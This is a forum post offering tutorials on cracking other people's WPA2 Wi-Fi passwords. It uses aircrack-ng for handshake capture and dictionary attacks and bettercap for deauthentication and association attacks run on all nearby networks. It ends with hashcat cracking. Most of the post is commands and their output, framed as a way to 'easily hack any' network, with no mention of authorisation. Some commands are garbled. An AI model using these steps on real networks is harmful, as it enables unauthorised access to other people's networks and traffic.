SpyLoaded Forum







News




Author Topic: See How To Easily Hack Any Wireless Networks Password  (Read 2118 times)

Offline Yakub Oloyede

  • Global Administrator
  • Hero Member
  • *****
  • Posts: 3550



See How To Easily Hack Any Wireless Networks Password

Tutorial 1: Cracking Wireless networks using Aircrack-ng tools :

Let’s get started, so first need to fire up terminal :

We will assume your wireless interface name iswlan0but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:



airmon-ng start wlan0

Runiwconfig. You should now see a new monitor mode interface listed (likelymon0orwlan0mon).


Find Your Target

Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:

airodump-ng wlan0mon

You should see output similar to what is below.

Code: [Select]
CH 13 ][ Elapsed: 52 s ][ 2020–06–09 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests 14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8 14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0> 14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro 9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme

Now we’ll capture handshake :

airodump-ng -c 3 — bssid 9C:5C:8E:C9:AB:C0 -w . wlan0mon0

CH 6 ][ Elapsed: 1 min ][ 2020–06–09 16:09 ]

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
 
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS

now we simply change name of .cap files : mv ./-01.cap hackme.cap

Crack the Network Password

The final step is to crack the password using the captured handshake.

Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:

# download the 134MB rockyou dictionary file
Code: [Select]
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note, that if the network password is not in the wordlist you will not crack the password.

Code: [Select]
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfileaircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
But chances are you’ll end up getting nothing so it’s better to create a wordlist, just open up notepad tool or something and make guess password you can create with relate to wifi and passwords must have /n spaces like below :



If the password is cracked you will see aKEY FOUND!message in the terminal followed by the plain text version of the network password.

Code: [Select]
Aircrack-ng 1.2 rc4[00:01:49] 111040 keys tested (1017.96 k/s)KEY FOUND! [ ADHACKER ]Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2ETransient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

Simply switch to tutorial 2 because I wrote the script that uses aircrack-ng, here I simply automated the aircrack tool so must checkout.

Tutorial 2 - Alright let’s learn how you can hack a Wireless Network or simply WiFi Networks. In this tutorial we’re going to use Kali Linux, no matter you can use any of the GNU/Linux systems. So, the prerequisites are a working pc with Linux, a wireless adapter with packet monitoring (no need if your system wifi is fine) & Bettercap tool

Now, locate your card with ifconfig or ip a to find the name of your network adapter. It should be something like wlan0 for your internal adapter and wlan1 for your USB network adapter.





Now put it in monitor mode :



and now we start bettercap by tyoing the command :

~# sudo bettercap --iface wlan1mon

Now we’re in better cap so let’s navigate, this is how it looks :

~# sudo bettercap — iface wlan1mon

bettercap v2.24.1 (built for linux amd64 with go1.12.7) [type ‘help’ for a list of commands]

wlan1 »


“ wlan1 >> “ is prompt here, just need to type in commands to be performed. Let’s recon nearby devices:



Here we get wireless details and address now we need to launch a deauth attack to get handshakes.



Now we’ll show the what results we get by typing in command :

wlan1 » wifi.show

this will show you complete details here. To simple save the handshake data we’’ll simple do :

wlan1 » set wifi.handshakes /root/hacker

Change the location as per your system, now we’re going to begin our attack against unattended networks, we’ll type wifi.assoc and then the MAC address that we want to attack.

wlan1 » wifi.assoc all

By running both modules, we were able to grab the information we need for five out of the ten closest Wi-Fi networks. That’s pretty impressive. If we open the file Bettercap generated from these captures, we can see the information Bettercap has saved for us to crack in another program.



Later we’ll crack password using Hashcat :

Code: [Select]
~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'pass.txt'

Tutorial 3



You can get the free tool from my github at :
Click here to get tools












TAG:





 

With Quick-Reply you can write a post when viewing a topic without loading a new page. You can still use bulletin board code and smileys as you would in a normal post.

Note: this post will not display until it's been approved by a moderator.
Name: Email:
Verification:
"5 eggs" Multiply By "4 eggs" Is what ?:


Close
SimplePortal 2.3.6 © 2008-2014, SimplePortal